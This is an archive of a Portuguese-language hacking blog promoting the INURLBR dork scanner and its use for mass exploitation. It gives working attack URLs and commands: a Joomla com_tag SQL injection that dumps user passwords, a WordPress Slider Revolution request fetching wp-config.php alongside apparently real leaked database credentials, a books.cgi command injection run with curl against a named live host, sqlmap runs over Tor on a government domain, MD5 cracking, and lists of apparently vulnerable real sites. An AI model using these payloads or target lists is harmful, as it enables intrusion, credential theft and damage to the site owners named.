Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador script inurl. Mostrar todas as postagens
Mostrando postagens com marcador script inurl. Mostrar todas as postagens

segunda-feira, 15 de setembro de 2014

VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP


VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP

INURLBR Utilizando frameworks de comandos externos


Este tutorial mostra a utilização do SCANNER inurlbr.php
em conjunto com frameworks-scripts de comandos externos ...
usando a flag [--comand-vul] e uma dork para encontrar sql relacionado
vuls ou coleta de informações utilizando framework nmap ...

Este tutorial irá focar em mostrar como o nmap e SqlMap
pode ser usado em conjunto com o SCANNER  inurlbr.php ...
Para mais informações sobre inurlbr sintaxe e como usar o SCANNER
[PHP inurlbr.php --help]

ASSISTA:



Scanner-INURLBR repository: https://github.com/googleinurl/SCANNER-INURLBR

quarta-feira, 6 de agosto de 2014

SCANNER INURLBR + Zimbra - Privilegie Escalation via LFI (0day)

0xEXPLOIT ZIMBRA

 Demonstração na pratica utilizando o Scanner INURLBR juntamente com Zimbra 0day exploit.  Lembrando que nenhum dado do servidor acessado foi alterado, apenas compartilhando conhecimento.  Não me responsabilizou pelo seu mau uso.

Demonstração na pratica utilizando o Scanner INURLBR juntamente com Zimbra 0day exploit.
Lembrando que nenhum dado do servidor acessado foi alterado, apenas compartilhando conhecimento.
Não me responsabilizou pelo seu mau uso.


http://www.exploit-db.com/exploits/30085/
http://securityattack.com.br/emails-do-governo-igrejas-e-empresas-vulneraveis-em-ano-de-eleicao/

Até a próxima!!!

segunda-feira, 4 de agosto de 2014

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


0x Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


Slider Revolution Responsive é um plugin do wordpress muito utilizado hoje em dia por sites que abortam diversos temas variando de sites governamentais ate mesmo sites de lojas uma falha que aos olhos de muitos poderia ser algo banal acabou virando uma grande dor de cabeça.
O bug permite a download do arquivo wp-config entre outros, no wp-config contem

  1. define('DB_NAME', 'lojaphos'); Nome do banco de dados
  2. define('DB_USER', 'lojaphos'); Usuário relativo ao banco que contem o Wordpress
  3. define('DB_PASSWORD', 'silva2805'); Senha do banco
  4. define('DB_HOST', 'mysql.phosloja.com.br'); normalmente estará como localhost
 0x Explorando 

            Dork revslider.php "index of"
            http://site.alvo/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.
Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.

 No vídeo abaixo demostra a exploração com o inurlbr
                                                                   

terça-feira, 29 de julho de 2014

Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5


Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.


 Comandos utilizado:

php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://[email protected]:9050 --tor-random

Opções:

--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP

Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR

Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10

Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050

Parrot e derivados: # service tor start

Verificar se está rodando: # netstat -an | grep 9050

tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN


Comando utilizado DECRYPTERMD5:

php md5.php --md5 HASH --proxy socks5://[email protected]:9050

Opções:

--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato

Para maiores informações utilize: # php md5.php --help

É isso ai ;-)

segunda-feira, 28 de julho de 2014

INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK

Script feito em php que pesquisa dados públicos através de requests do próprio facebook.
Temos acesso ao seguinte resultado:

     ID::
    USERNAME::
    NOME::
    PRIMEIRO NOME::
    SOBRENOME::
    SEXO::
    LOCAL::
    FOTO LOGO PEQUENA::
    FOTO LOGO GRANDE::
    FOTO LOGO::
    FOTO::


Exemplo de uso:

[+] Pesquisa dados facebook, Ex: php face.php zuck

[ RETORNO ]
INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK

Baixar:: http://pastebin.com/TdfymVXr

quinta-feira, 24 de julho de 2014

Introdução SCANNER INURLBR V1.0

Introdução SCANNER INURLBR V1.0
[+]  Introdução  
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado.  *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____
(_____)
(() ())
\   /
\ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------


Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.

-q tem acesso a 12 motores de busca.
1   - www.google.com.br
2   - www.bing.com
3   - br.search.yahoo.com
4   - www.ask.com
5   - search.hao123.com.br
6   - ajax.googleapis.com
7   - search.lycos.com
8   - busca.uol.com.br
9   - us.yhs4.search.yahoo.com
10  - pesquisa.sapo.pt
11  - www.dmoz.org
12  - www.gigablast.com
all  - todos motores de busca
Default:    1
Exemplo: -q {op}
Uso:
         -q 1 
         -q 5
Múltiplos motores  -q 1,2,5,6,11
Todos motores        -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:

0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla

  
0xDetalhes:

 * joomla component com_tag (tag_id) SQL Injection Vulnerability
 * [Joomla componente]
 * com_tag (tag_id) Vulnerável a SQL-injection

0xCOMANDOS INURLBR:

./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'


0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR

Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html

segunda-feira, 21 de julho de 2014

Testando novo Scanner inurl beta

BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS

                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]

#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR:    Cleiton Pinheiro
#Nick:     Googleinurl
#Blog:     http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão:  1.0
#-------------------------------------------------------------------------------
#PHP Version         5.4.7
#php5-curl           LIB
#php5-cli            LIB 
#cURL support        enabled
#cURL Information    7.24.0
#Apache              2.4
#allow_url_fopen     On
#permission          Reading & Writing
#User                root privilege, or is in the sudoers group
#Operating system    LINUX
#Proxy random        TOR               
#####################################

[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w

Testando novo Scanner inurl 1.0 beta

Testando novo Scanner inurl 1.0 beta


http://pastebin.com/Tb0Qp0qY

sexta-feira, 18 de julho de 2014

DecrypterMD5 API

[ INURLBR API DecrypterMD5  ]
 bdbbe98d4714585c4a2eae76cd0e3cae
xNeither war between hackers, nor peace for the system.
----------------------------------------------------------------------------------
[+] Pesquisa por arquivo, Ex: php md5.php --file filemd5.txt
[+] Pesquisa simples, Ex: php md5.php --md5 21232f297a57a5a743894a0e4a801fc3
                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]



INURLBR API DecriptMD5
----------------------------------------------------------------------------------
INURLBR API DecriptMD5  RESULTADOS

Proxy camuflagem envio de request.
- Exemplo: --proxy {proxy:porta}
- Uso:        --proxy localhost:8118
                  --proxy socks5://[email protected]:9050
                  --proxy http://admin:[email protected]:8080

O uso da rede TOR no script garante que você não seja bloqueado em requisições massivas.

Baixar:: http://pastebin.com/grYTVJKF

quinta-feira, 3 de julho de 2014

joomla component com_tag (tag_id) SQL Injection Vulnerability

[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection


0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component 


Exemplo: 


http://WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=1

/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}

Injetando:

http://
WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component

RESPOSTA:

[X] com_tag (tag_id) Vulnerável a SQL-injection



REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability

ALGUNS RESULTADOS:
Usando scanner INURLBR:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY

quinta-feira, 5 de junho de 2014

Executar comandos remotamente via books.cgi Web Terra v. 1.1



Executar comandos remotamente via books.cgi Web Terra v. 1.1

[+] Remote Comand Execution on books.cgi Web Terra v. 1.1
[+] Date: 21/05/2014
[+] CWE number: CWE-78
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Contact: [email protected]
[+] Tested on: Windows 7 and Linux
[+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra
[+] Vulnerable File: books.cgi
[+] Version : 1.1
[+] Exploit: http://host/patch/books.cgi?file=|COMANDO|

CGI é um acrónimo para a expressão inglesa Common Gateway Interface. Consiste numa importante tecnologia que permite gerar páginas dinâmicas, permitindo a um navegador passar parâmetros para um programa alojado num servidor web. Assim, designam-se por scripts CGI os pequenos programas que interpretam esses parâmetros e geram a página depois de os processar.O CGI foi concebido como o culminar de discussões por especialistas durante os primórdios da Internet, nomeadamente entre Rob McCool, John Franks, Ari Luotonen, George Phillips e Tony Sanders. DEmbora a linguagem tipicamente associada aos CGI seja o Perl, o CGI foi concebido de forma a ser independente da linguagem utilizada. Actualmente tecnologias como ASP.NET, PHP, Python e Ruby continuam a utilizar a especificação.


/DORK's: 
------------------------------------------------------------------------------------------
inurl:*"/books.cgi?file=*"
inurl:"/books.cgi?file="
inurl:"/books/" ext:cgi inurl:"books.cgi" "book1.txt" 
------------------------------------------------------------------------------------------  

Exemplo de achados:
http://www.hi-ho.ne.jp/cgi-bin/user/yyama/books.cgi?file=interbook.txt&subject=%E5%A5%AA%E6%8F%83%E9%81%9C%E5%A5%AA%E8%B6%B3%E6%9D%9F%E5%A5%AA%E7%AA%B6%E8%AC%82&start=2910
www.hi-ho.ne.jp/cgi-bin/user/yyama/books.cgi?file...txt...
http://ffg.sakura.ne.jp/ffg/book/081_120/books.cgi?file=book100.cgi&subject=%E7%AB%AA%5B%EF%BE%85%F3%BE%AC%9C&start=0
http://cgi.members.interq.or.jp/rabbit/hirotti/book/books.cgi?file=book13.txt&subject=%82%A4%82%E9%90%AF%81%7B%8C%A2%96%E9%8D%B3&start=240
http://nocturne.staba.jp/books/books.cgi?file=book2.txt&subject=%83V%83%8A%83A%83X%83X%83g%81%5B%83%8A%81%5B&start=19160
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book4.txt&subject=%82%B1%82%B1%82%EB%96%CD%97l&start=140

Comando CURL:
OS Command ('OS Command Injection')

 curl  -v 'http://redsuns.x0.com/webnovel/books.cgi?file=|id|'


0xResultado:

uid=1085(spider) gid=1000(users) groups=1000(users)
 curl  -v 'http://redsuns.x0.com/webnovel/books.cgi?file=|id|' * About to connect() to redsuns.x0.com port 80 (#0) *   Trying 210.188.227.146... * connected * Connected to redsuns.x0.com (210.188.227.146) port 80 (#0) > GET /webnovel/books.cgi?file=|id| HTTP/1.1 > User-Agent: curl/7.26.0 > Host: redsuns.x0.com > Accept: */* >  * additional stuff not fine transfer.c:1037: 0 0 * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 200 OK < Via: 1.1 IRAQUE < Connection: Keep-Alive < Proxy-Connection: Keep-Alive < Transfer-Encoding: chunked < Date: Thu, 05 Jun 2014 16:44:24 GMT < Content-Type: text/html < Server: Apache/1.3.42 (Unix)

Usando [ SCANNER INURL ]
Usando [ SCANNER INURL ]

DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => 'a href=book'
    [cmd] => nmap -sV -p 80,8080,21,22,3306 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22&num=1900&btnG=Search
    [port] => 80
)



0xRESULTADO::

TOTAL DE URL's: 71
EXPLOIT USADO:
DORK: inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22
TOTAL DE POSSÍVEIS VULL: 19
ARQUIVO COM RESULTADO:resultados.txt
LISTA:

http://webcache.googleusercontent.com/search?q=cache:ovc5k7pkIrwJ:http://www2.pos.to/~fuyumi/tomonokai/cgi-bin/books.cgi?file%3Dbook1.txt%26subject%3D%26start%3D579%2Binurl:%22/books/%22+ext:cgi+inurl:%22books.cgi%22+%22book1.txt%22&num=1900&hl=pt-BR&&ct=clnk
http://ted.pekori.to/bbs/books/books.cgi?file=book1.txt&subject=%83%8A%83%8C%81%5B%8F%AC%90%E0%81E%96l%82%E7%82%CCPBM%94%92%8F%91&start=40
http://webcache.googleusercontent.com/search?q=cache:a2iYNKIzSvUJ:http://ted.pekori.to/bbs/books/books.cgi?file%3Dbook1.txt%26subject%3D%2583%258A%2583%258C%2581%255B%258F%25AC%2590%25E0%2581E%2596l%2582%25E7%2582%25CCPBM%2594%2592%258F%2591%26start%3D40%2Binurl:%22/books/%22+ext:cgi+inurl:%22books.cgi%22+%22book1.txt%22&num=1900&hl=pt-BR&&ct=clnk
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=820
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=280
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=240
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=840
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=420
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%E8%5E%8F%8F%90%5C%E8%5E%BDT%E8%5E%8F%83%96%8B%FA%AC%5C%E8%5E%8F%8F%90%5C%DC%98Y&start=100
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1120
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1020
http://www.wao.or.jp/user/take123/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%83R%83%8D%83%93
http://www.scorpion.ne.jp/~kaimu/cgi-bin/books.cgi?file=book1.txt&subject=%8C%8E%82%CC%8D%CA
http://www6.airnet.ne.jp/tangent/novel/books.cgi?file=book1.txt&subject=%8AC%94n%8F%B2%82%CC%8E%96%8C%8F%95%EB
http://www.kcn.ne.jp/cgi-bin/blue/books.cgi?file=book1.txt&subject=%A5%B3%A1%BC%A5%B8
http://hccweb1.bai.ne.jp/~apaaf603/main/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%82%A0%82%AE%82%E9
http://mbl.myftp.biz/~sgon/tryhp/books1/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%93c%8C%E1%8D%EC
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1240
http://www.gifunisi.jp/cgi/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%8F%BC%93c%97D%8D%EC

SCRIPT INURL
http://pastebin.com/TzijC99y
Mais informações sobre falhas desse tipo:
http://cwe.mitre.org/data/definitions/78.html
EXPLOIT:
http://www.exploit-db.com/exploits/33494/
Ref:
http://thobias.org/doc/cgi_shell.html

quinta-feira, 23 de janeiro de 2014

TUTORIAL / BUSCAR EMAILS [ SCANNER INURLMAIL 1.0 ]


INURLMAIL
TUTORIAL / BUSCAR EMAILS [ SCANNER INURLMAIL 1.0 ]


Demonstração de uso do scanner a versão que é utilizada neste vídeo é uma beta, mas o link disponível para down já é final de uso.
VÍDEO AULA PART-01
###################################
* SCANNER INURL-MAIL 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão Leitura & Escrita
* -----------------------------------------------------------------
* BUSCA LISTMAIL
* OBJETIVO USAR O MOTOR DE BUSCA GOOGLE PARA CAPTURAR EMAILS LIST.
* A CADA URL ENCONTRADA PELO BUSCADOR, SERA EFETUADO UM FILTRO      CAPTURANDO OS EMAILS
* CONTIDOS NA URL.
* -----------------------------------------------------------------
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br
################################

Tutorial SCANNER INURLMAIL 1.0 PART-01





Comando de uso:
php inurlmail.php  --dork='site:.com.br hotmail ext:txt'  --arquivo='mails.txt'
php inurlmail.php ajuda

Tutorial SCANNER INURLMAIL 1.0 PART-02



Baixar: https://github.com/googleinurl/INURLMAIL

segunda-feira, 30 de setembro de 2013

Exploit Editwrx PHP - execução de código remoto

Exploit Editwrx PHP
EditWRX é vulnerável a execução de código remoto através da falta de filtro function
open() no downloader, que pode ler em comandos canalizados na GET "download" Apesar do downloader ser um componente administrativo, O login Não é necessário para executar a função.


Exploit Editwrx PHP

Exploit Editwrx PHP


DORK: site:.com editwrx/wrx.cgi ext:cgi 
BAIXAR: http://pastebin.com/fDaWb3kW